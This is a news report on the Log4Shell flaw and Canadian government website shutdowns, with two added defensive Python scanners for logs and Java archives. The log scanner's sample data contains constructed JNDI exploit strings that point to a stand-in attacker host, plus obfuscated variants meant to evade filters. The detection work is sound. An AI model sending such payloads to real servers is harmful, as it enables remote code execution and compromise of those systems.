Several government agency websites, both federal and provincial, were forced to shut down after news of a critical software vulnerability surfaced.
The zero-day vulnerability, dubbed “Log4Shell” and tracked as CVE-2021-44228, was publicly disclosed in early December; the flaw had been present in the code since 2013 without being noticed. It is a bug in Log4j 2, the open-source logging library from the Apache Software Foundation that is embedded in a very large number of Java applications and services. Log4j 2 expands certain lookup expressions inside the strings it logs, so an attacker who can get a crafted string of the form ${jndi:ldap://host/path} into a logged field (a request header or a form value, for example) can make the server contact a host the attacker controls and load code from it. The result is remote code execution on the server, which attackers use to install malware or other tooling.
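The one practical check most readers can run today is to look for exploitation attempts in their web-server logs. The following Python is an added example, not code from the article or from any of the organizations named in it. It scans combined-format access-log lines for Log4Shell payloads and, because attackers quickly moved to hiding the literal "jndi" with nested lookups such as ${lower:j} and ${::-j} and with URL encoding, it first resolves those obfuscations the way Log4j would before matching. The log lines, IP addresses (documentation range 198.51.100.0/24) and payloads are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further "$", "{" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after obfuscation has been resolved; group 1 is the URI scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
_MAX_ROUNDS = 20  # bound the inside-out resolution so pathological input cannot spin

# Constructed sample lines (not real traffic). Lines 0 and 5 are benign; 1-4 carry a
# plain, a lower:-obfuscated, a default-value-obfuscated and a URL-encoded JNDI lookup.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '198.51.100.24 - - [10/Dec/2021:12:00:05 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.25 - - [10/Dec/2021:12:00:06 +0000] "GET /render?tpl=%24%7Bname%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


def _resolve_inner(match):
    """Resolve one innermost lookup the way Log4j 2 would for the forms attackers abuse:
    ${lower:X}, ${upper:X} and the default-value syntax ${name:-default} with a name
    chosen never to resolve. Anything else (including ${jndi:...} itself) is kept as-is."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(value: str) -> str:
    """Undo URL encoding (twice, since payloads are sometimes double-encoded), then
    resolve nested lookups from the inside out until the string stops changing."""
    text = unquote(unquote(value))
    for _ in range(_MAX_ROUNDS):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line: str):
    """Return {"scheme", "payload"} for a JNDI lookup in this line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    payload = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
    return {"scheme": m.group(1).lower(), "payload": payload}


def scan(lines):
    """Scan many lines; each hit also records the zero-based line index."""
    hits = []
    for idx, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            finding["line"] = idx
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup {hit['payload']}")
```

A hit in the log means an attempt, not a confirmed compromise; the server is only at risk if the request reached a vulnerable Log4j 2 instance that logged the field. The normalizer only handles the obfuscation forms listed in its comment, so treat it as a starting point for a detection rule rather than a complete one.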
Security experts believe Log4Shell affects hundreds of millions of devices worldwide.
In light of the vulnerability’s discovery, the Canada Revenue Agency (CRA) last week took several of its online services down, preventing users from accessing their accounts.
“The CRA has become aware of a security vulnerability affecting organizations around the world. As a precaution, we have proactively decided to take our systems offline while we work to secure our systems,” a notice from the CRA said, adding that the agency has no indication that its systems have been compromised, nor has there been any sign that a taxpayer’s information had been accessed by an unauthorized individual.
Over the weekend, the Quebec government also shut down nearly 4,000 of its websites as a precaution against the exploit. Websites related to education, health, and public administration were affected by the shutdown.
Quebec minister for government digital transformation Éric Caire said that there is no indication that the government was the victim of a successful cyber attack, CBC News reported.
Experts have also reminded private companies that they are exposed to the same vulnerability.
Patrick Mathieu, the co-founder of the Quebec-based computer security event Hackfest, told The Canadian Press that he is concerned about the lack of communication from major companies such as banks about how they are working to address the vulnerability.
“Yes, the [Quebec] government shut this down, but what about big institutions, finance, insurance, mortgage, medical companies? Are they working on the issue?” said Mathieu. “The lack of transparency right now, it’s dangerous.”
Sumit Bhatia, a director at the Rogers Cybersecure Catalyst at Ryerson University, explained that even if small and medium-sized businesses are not themselves developing software with log4j, they may still be using products and services from developers that do.
“And it’s important to them to reach out to their service providers and ask about the steps that have been taken,” the university expert noted.
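For vendor software an organization runs on its own servers (a supplied .war on an application server, a bundled .jar), the question Bhatia raises can be answered directly by taking inventory. The following Python is an added example, not code from the article or from any vendor: it opens a Java archive, descends into archives nested inside it, reports every copy of log4j-core with the version recorded in its Maven pom.properties, and notes whether JndiLookup.class is still present (deleting that class from the jar was the Apache-documented workaround for deployments that could not patch immediately). The .war and .jar files it builds are constructed stand-ins containing only the marker files the scanner keys on.

```python
import io
import sys
import zipfile
from typing import List

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MAX_NESTING = 4  # jar inside war inside ear is normal; deeper than this is suspicious


def _version_from_pom(zf: zipfile.ZipFile) -> str:
    """Read 'version=' from log4j-core's pom.properties, or 'unknown' if it is missing."""
    try:
        text = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return "unknown"
    for line in text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "version":
            return value.strip()
    return "unknown"


def scan_archive(data: bytes, path: str, depth: int = 0) -> List[dict]:
    """Return one finding per log4j-core copy in the archive or in archives nested inside
    it. Mitigated copies (JndiLookup.class removed) are reported too, flagged as such."""
    findings: List[dict] = []
    if depth > MAX_NESTING:
        return findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container: plain files are simply skipped
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP_CLASS in names or POM_PROPERTIES in names:
            findings.append({
                "path": path,
                "version": _version_from_pom(zf),
                "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
            })
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), f"{path}!/{name}", depth + 1))
    return findings


def build_log4j_core_jar(version: str, keep_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the files the scanner looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if keep_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_sample_war() -> bytes:
    """Constructed vendor-style .war bundling log4j-core 2.14.1 next to an unrelated jar."""
    other = io.BytesIO()
    with zipfile.ZipFile(other, "w") as zf:
        zf.writestr("com/example/Util.class", b"\xca\xfe\xba\xbe")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_log4j_core_jar("2.14.1", True))
        zf.writestr("WEB-INF/lib/other-lib-1.0.jar", other.getvalue())
    return buf.getvalue()


if __name__ == "__main__":
    # With no arguments, scan the constructed sample; otherwise scan the archives given.
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("sample.war", build_sample_war())]
    for path, data in targets:
        for f in scan_archive(data, path):
            state = "JndiLookup present" if f["jndi_lookup_present"] else "JndiLookup removed"
            print(f"{f['path']}: log4j-core {f['version']} ({state})")
```

Compare each reported version against the current Apache Log4j security advisory rather than hard-coding a threshold, since the project shipped follow-up releases after the first fix. The scanner only sees archives on disk; hosted services a vendor runs for you still have to be checked by asking the vendor, which is the point Bhatia makes.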